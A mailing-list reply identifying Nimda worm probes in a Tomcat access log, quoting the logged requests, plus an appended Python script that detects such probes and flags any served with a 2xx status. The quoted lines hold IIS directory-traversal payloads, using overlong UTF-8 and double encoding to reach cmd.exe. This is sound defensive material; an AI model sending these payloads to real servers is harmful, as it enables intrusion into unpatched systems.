This is simply some Windows server that is infected with the Nimda Worm looking for a new place to crawl to. It only infects non-patched IIS servers, so for Tomcat stand-alone or Apache, you can safely ignore it.

"Laszlo Nadai" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED]...
> I am fairly new to Tomcat, scripts, etc.
> I found the following and similar entries in my access log file:
>
> 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 624
> 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 618
> 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.160.45.159 - - [28/Dec/2002:15:00:18 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
> 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
> 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
> 64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
> 64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
> 64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 624
> 64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 618
> 64.160.45.159 - - [28/Dec/2002:16:01:58 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.160.45.159 - - [28/Dec/2002:16:02:00 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.160.45.159 - - [28/Dec/2002:16:02:04 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
> 64.160.45.159 - - [28/Dec/2002:16:02:06 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
> 64.160.45.159 - - [28/Dec/2002:16:02:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
> 64.160.45.159 - - [28/Dec/2002:16:02:09 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
> 64.160.45.159 - - [28/Dec/2002:16:02:10 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
> 64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 624
> 64.165.213.97 - - [28/Dec/2002:16:38:16 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 618
> 64.165.213.97 - - [28/Dec/2002:16:38:20 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
> 64.165.213.97 - - [28/Dec/2002:16:38:24 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
>
> Can someone tell me what someone else was trying to do?
> Based on the log, should I change any settings in my config?
>
> Thanks,
> laszlo
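
A way to check an access log for the probe requests quoted in this thread and confirm that none was answered with a 2xx status, as an added example that is not part of the original messages. The names `CLF`, `PROBE` and `summarize` are illustrative, and the two entries from 192.0.2.10 and 198.51.100.7 are constructed for the demonstration.

```python
import re
from collections import defaultdict

# Common Log Format: host ident user [time] "method path proto" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')

# Shapes seen in the quoted log: root.exe or cmd.exe invoked with a query
# string, or "../" hidden behind overlong UTF-8 (%c0%af, %c1%1c, %c1%9c)
# or double percent-encoding (%%35%63, %%35c).
PROBE = re.compile(r'(?i)/(?:root|cmd)\.exe\?|\.\.%(?:c[01]%[0-9a-f]{2}|%35)')

def summarize(lines):
    """Count probe requests per source and list any answered with 2xx."""
    report = defaultdict(lambda: {"probes": 0, "served": []})
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # skip anything that is not an access-log entry
        host, path, status = m.groups()
        if PROBE.search(path):
            report[host]["probes"] += 1
            if status.startswith("2"):
                report[host]["served"].append(path)
    return dict(report)

SAMPLE = [
    # Entries copied from the quoted log
    '64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 624',
    '64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648',
    '64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718',
    '64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687',
    '64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721',
    '64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 624',
    # Constructed entries: a normal page hit, and a probe answered with 200
    '192.0.2.10 - - [28/Dec/2002:15:05:00 -0800] "GET /index.jsp HTTP/1.0" 200 2048',
    '198.51.100.7 - - [28/Dec/2002:15:06:00 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for host, info in summarize(SAMPLE).items():
        verdict = "INVESTIGATE" if info["served"] else "rejected, no action"
        print(f"{host}: {info['probes']} probes, {verdict}")
```

Every entry in the quoted log ends in 400 or 404, so the `served` list stays empty for both sources there; only the constructed 200 entry is flagged.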